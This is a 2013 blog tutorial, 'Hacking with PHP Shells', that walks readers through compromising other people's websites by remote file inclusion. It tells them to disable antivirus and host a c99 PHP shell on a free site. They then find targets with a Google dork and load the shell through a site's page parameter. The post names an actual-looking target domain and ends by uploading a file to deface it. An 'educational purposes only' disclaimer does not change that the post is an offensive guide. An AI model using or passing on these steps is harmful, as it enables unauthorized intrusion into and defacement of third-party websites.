Connect With Us

Wednesday 2 January 2013

HACKING WITH PHP SHELLS

08:32    No comments
HACKING WITH PHP SHELLS


NOTE:-THIS TUTORIAL IS FOR EDUCATIONAL PURPOSES ONLY 

You might want to disable your AV, it doesn't like PHP Shells.
First of all, you need to Download the PHP shell.
DOWNLOAD FROM HERE 

Change the file extension from .php to .txt. You will have something like this:
                                                  
Now, we need to host the Shell on a free hosting site. I use 110MB.com.
 
Now, onto the good stuff.

Now we must find an exploitable site. You can easily find one by putting this in Google:
inurl:"index.php?file=contact.php"

Note- You can remove Contact for more results

Okay, we will use this site for an example:
p0rnteddy.com

To make sure the site is exploitable, we will try to run google in it.

It's rather simple, all you do it remove the "tagwall.php" part, and type "http://www.google.com", like so:
http://p0rnteddy.com/?page=http://www.google.com
 
If you see somewhat of a page that looks like Google, congratulations, you have found an exploitable site! This is what you should see:

                                                        
Now we run the PHP Shell in it. Simply replace Google's URL and replace it with my Shell, this is what your URL should look like:
http://p0rnteddy.com/?page=http://gamer1...om/c99.txt
Okay, now we're in. This is what you should see-
 
                                                            
I advise you don't mess with the Index.html, you can get in legal trouble. But we're going to do something harmful, but cool. Make a .txt file with what you want the page to say. Upload it here, at the bottom of the page- 
 
                                            
Click browse, select your .txt file, and Click "Upload". Your .txt file is now on their database. To see your .txt file, go here:
http://p0rnteddy.com/NAMEOF YOUR FILE.txt

For example, here is mine:
http://p0rnteddy.com/Owned.txt
 
You have now hacked the site.
 
Dont Forget To Say Thanks..
 
Enjoy..!!

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)